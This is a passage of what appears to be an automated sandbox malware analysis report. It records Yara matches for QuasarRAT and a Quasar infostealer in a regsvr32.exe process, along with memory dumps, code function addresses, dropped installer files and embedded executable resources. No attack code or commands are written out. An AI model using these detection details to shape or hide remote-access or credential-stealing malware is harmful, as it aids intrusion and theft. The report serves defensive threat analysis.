Source: Yara match	File source: 17.2.regsvr32.exe.2bd12ae.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2bd12ae.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.1c3f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.regsvr32.exe.2fa92de.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2540192670.0000000002FA8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2541753861.0000000003831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2541753861.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2539716605.0000000002BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2543209302.0000000013831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 2224, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 17.2.regsvr32.exe.1c3f0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 17.2.regsvr32.exe.1c3f0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 17.2.regsvr32.exe.1c3f0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 17.2.regsvr32.exe.2fa92de.1.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 17.2.regsvr32.exe.2fa92de.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 17.2.regsvr32.exe.2fa92de.1.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 17.2.regsvr32.exe.13839ac0.2.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 17.2.regsvr32.exe.13839ac0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 17.2.regsvr32.exe.13839ac0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 17.2.regsvr32.exe.13839ac0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 17.2.regsvr32.exe.13839ac0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 17.2.regsvr32.exe.13839ac0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 17.2.regsvr32.exe.2bd12ae.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 17.2.regsvr32.exe.2bd12ae.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 17.2.regsvr32.exe.2bd12ae.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 17.2.regsvr32.exe.2bd12ae.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 17.2.regsvr32.exe.2bd12ae.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 17.2.regsvr32.exe.2bd12ae.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 17.2.regsvr32.exe.1c3f0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 17.2.regsvr32.exe.1c3f0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 17.2.regsvr32.exe.1c3f0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 17.2.regsvr32.exe.2fa92de.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 17.2.regsvr32.exe.2fa92de.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 17.2.regsvr32.exe.2fa92de.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Quasar infostealer Author: ditekshen

.NET source code contains very large array initializations

Source: ST.exe.1.dr, c3J1Bpq.cs	Large array initialization: c3J1Bpq: array initializer size 3254
Source: ST.exe.1.dr, Tn58Wjo.cs	Large array initialization: Gm18Fqj: array initializer size 3784
Source: ST.exe.1.dr, Tn58Wjo.cs	Large array initialization: r3D5Cjy: array initializer size 2991
Source: ST.exe.1.dr, Tn58Wjo.cs	Large array initialization: Tn58Wjo: array initializer size 2709

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 4_2_00007FF7C022EB7D NtWriteVirtualMemory,

4_2_00007FF7C022EB7D

Source: C:\Users\user\Downloads\ST.exe

Code function: 20_2_01EAB070 CreateProcessAsUserW,

20_2_01EAB070

Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A03A9D210	1_2_0000015A03A9D210
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A03A9BFE0	1_2_0000015A03A9BFE0
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A03A99AF0	1_2_0000015A03A99AF0
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A058616AD	1_2_0000015A058616AD
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A0617AE30	1_2_0000015A0617AE30
Source: C:\Users\user\Desktop\lO5lV39HDj.exe	Code function: 1_2_0000015A06176140	1_2_0000015A06176140
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBC7826	17_2_00007FF7BFBC7826
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBCE7A1	17_2_00007FF7BFBCE7A1
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBCC6E5	17_2_00007FF7BFBCC6E5
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBB8D41	17_2_00007FF7BFBB8D41
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBB54C9	17_2_00007FF7BFBB54C9
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBBAC29	17_2_00007FF7BFBBAC29
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBCB3F9	17_2_00007FF7BFBCB3F9
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBCFA90	17_2_00007FF7BFBCFA90
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBB4060	17_2_00007FF7BFBB4060
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBB0EFA	17_2_00007FF7BFBB0EFA
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFBC861F	17_2_00007FF7BFBC861F
Source: C:\Windows\System32\regsvr32.exe	Code function: 17_2_00007FF7BFCC2321	17_2_00007FF7BFCC2321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FF7BF95500B	18_2_00007FF7BF95500B
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA91C8	20_2_01EA91C8
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA0D40	20_2_01EA0D40
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA4478	20_2_01EA4478
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EABB00	20_2_01EABB00
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EAB2D8	20_2_01EAB2D8
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA62D1	20_2_01EA62D1
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA0920	20_2_01EA0920
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA9930	20_2_01EA9930
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA0D30	20_2_01EA0D30
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA0910	20_2_01EA0910
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA18E1	20_2_01EA18E1
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA18F0	20_2_01EA18F0
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA6881	20_2_01EA6881
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA5490	20_2_01EA5490
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA0040	20_2_01EA0040
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA0012	20_2_01EA0012
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA67F6	20_2_01EA67F6
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA7FC1	20_2_01EA7FC1
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA7FD0	20_2_01EA7FD0
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA0B89	20_2_01EA0B89
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA7F8D	20_2_01EA7F8D
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA0B98	20_2_01EA0B98
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA0330	20_2_01EA0330
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA431D	20_2_01EA431D
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA06E8	20_2_01EA06E8
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_01EA06DA	20_2_01EA06DA
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_020CA398	20_2_020CA398
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_020CB0E8	20_2_020CB0E8
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_020C6938	20_2_020C6938
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_021FBA5C	20_2_021FBA5C
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_021FCAE0	20_2_021FCAE0
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_021FE940	20_2_021FE940
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_021FD700	20_2_021FD700
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_021FDF78	20_2_021FDF78
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_021FF7F0	20_2_021FF7F0
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_021FD6CE	20_2_021FD6CE
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_021FF7C0	20_2_021FF7C0
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_072E4868	20_2_072E4868
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_072EE790	20_2_072EE790
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_072E4858	20_2_072E4858
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_087AF3C0	20_2_087AF3C0
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_087AF3B0	20_2_087AF3B0
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_09000040	20_2_09000040
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_09032D50	20_2_09032D50
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_090342BF	20_2_090342BF
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_090342D0	20_2_090342D0
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_087A0040	20_2_087A0040
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_087A0012	20_2_087A0012
Source: C:\Users\user\Downloads\ST.exe	Code function: 20_2_0903A5F0	20_2_0903A5F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF7BF954DFB	23_2_00007FF7BF954DFB

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\is-DN1EJ.tmp\_isetup\_isdecmp.dll E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64

Source: lO5lV39HDj.exe	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: BT.exe.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: BT.tmp.12.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: BT.tmp.12.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: BT.tmp.14.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: BT.tmp.14.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-N5K6F.tmp.15.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-N5K6F.tmp.15.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: is-SHGPV.tmp.15.dr

Static PE information: Number of sections : 11 > 10

Source: lO5lV39HDj.exe	Binary or memory string: OriginalFilename vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2546858724.0000015A03E50000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAccessibility-version.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2545689921.0000015A03AC0000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2546297662.0000015A03DD0000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2545731427.0000015A03AE0000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.Primitives.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2546798617.0000015A03E40000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2538679254.0000015A01EC1000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2544950241.0000015A039E0000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Collections.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2542598060.0000015A02D11000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Diagnostics.TraceSource.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2542478310.0000015A02CE0000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Diagnostics.TraceSource.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2542880456.0000015A02D51000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2553504188.0000015A06160000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Numerics.Vectors.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2545250432.0000015A03A60000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2538861845.0000015A01EE0000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Threading.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2553703942.0000015A06190000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.ComponentModel.TypeConverter.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2552832686.0000015A05D40000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.Common.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2538918360.0000015A01F00000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2551609505.0000015A05861000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.Primitives.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2538522345.0000015A01EA0000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2553181654.0000015A05EC1000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.Common.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2537916593.0000015A01E10000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.Primitives.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2536856455.0000015A01920000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Runtime.Loader.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2547096108.0000015A03E80000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2537212658.0000015A01960000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2545423139.0000015A03A91000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2546730732.0000015A03E20000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.ComponentModel.EventBasedAsync.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2537454954.0000015A01DC9000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameExtractor.dll4 vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2542346113.0000015A02CC1000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2545060158.0000015A03A21000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Collections.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2537711872.0000015A01DF1000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Drawing.Primitives.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2546471783.0000015A03E11000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.ComponentModel.EventBasedAsync.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2538440372.0000015A01E80000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2537029867.0000015A01941000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000000.1284026782.00007FF78F5D8000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamemscordaccore.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000000.1284026782.00007FF78F5D8000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameExtractor.dll4 vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2538222329.0000015A01E61000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2542196154.0000015A02CA1000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Threading.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2536034420.0000015A017F1000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.IO.FileSystem.DriveInfo.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2553574496.0000015A06171000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Resources.Extensions.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2536927509.0000015A01930000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Runtime.dll@ vs lO5lV39HDj.exe
Source: lO5lV39HDj.exe, 00000001.00000002.2549741435.0000015A04B71000.00000020.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Windows.Forms.dll@ vs lO5lV39HDj.exe

Source: 17.2.regsvr32.exe.1c3f0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 17.2.regsvr32.exe.1c3f0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 17.2.regsvr32.exe.1c3f0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 17.2.regsvr32.exe.2fa92de.1.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 17.2.regsvr32.exe.2fa92de.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 17.2.regsvr32.exe.2fa92de.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 17.2.regsvr32.exe.13839ac0.2.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 17.2.regsvr32.exe.13839ac0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 17.2.regsvr32.exe.13839ac0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 17.2.regsvr32.exe.13839ac0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 17.2.regsvr32.exe.13839ac0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 17.2.regsvr32.exe.13839ac0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 17.2.regsvr32.exe.2bd12ae.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 17.2.regsvr32.exe.2bd12ae.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 17.2.regsvr32.exe.2bd12ae.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 17.2.regsvr32.exe.2bd12ae.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 17.2.regsvr32.exe.2bd12ae.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 17.2.regsvr32.exe.2bd12ae.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 17.2.regsvr32.exe.1c3f0000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 17.2.regsvr32.exe.1c3f0000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 17.2.regsvr32.exe.1c3f0000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 17.2.regsvr32.exe.2fa92de.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 17.2.regsvr32.exe.2fa92de.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 17.2.regsvr32.exe.2fa92de.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
Source: 00000011.00000002.2544710877.000000001C3F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
